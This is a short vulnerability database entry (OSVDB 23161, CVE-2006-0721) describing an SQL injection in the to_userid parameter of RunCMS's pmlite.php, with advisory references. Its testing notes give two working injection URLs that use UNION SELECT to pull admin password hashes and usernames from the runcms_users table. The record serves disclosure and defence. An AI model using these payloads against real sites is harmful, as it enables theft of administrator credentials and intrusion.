RunCMS pmlite.php to_userid Variable SQL Injection

2006-02-14T09:17:38
ID OSVDB:23161
Type osvdb
Reporter OSVDB
Modified 2006-02-14T09:17:38

Description

Manual Testing Notes

http://[target]/modules/messages/pmlite.php?send=2&to_userid=-1%20union%20%20%20%20select%20pass%20from%20runcms_users%20where%20level=5

http://[target]/modules/messages/pmlite.php?send=2&to_userid=-1//union//select//uname//from/*/runcms_users%20where%20level=5/hamid-network-security-team-http://[attacker]

References:

Vendor URL: http://www.runcms.org/ Security Tracker: 1015626 Secunia Advisory ID:18831 Other Advisory URL: http://hamid.ir/security/runcms.txt Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-02/0279.html FrSIRT Advisory: ADV-2006-0572 CVE-2006-0721 Bugtraq ID: 16652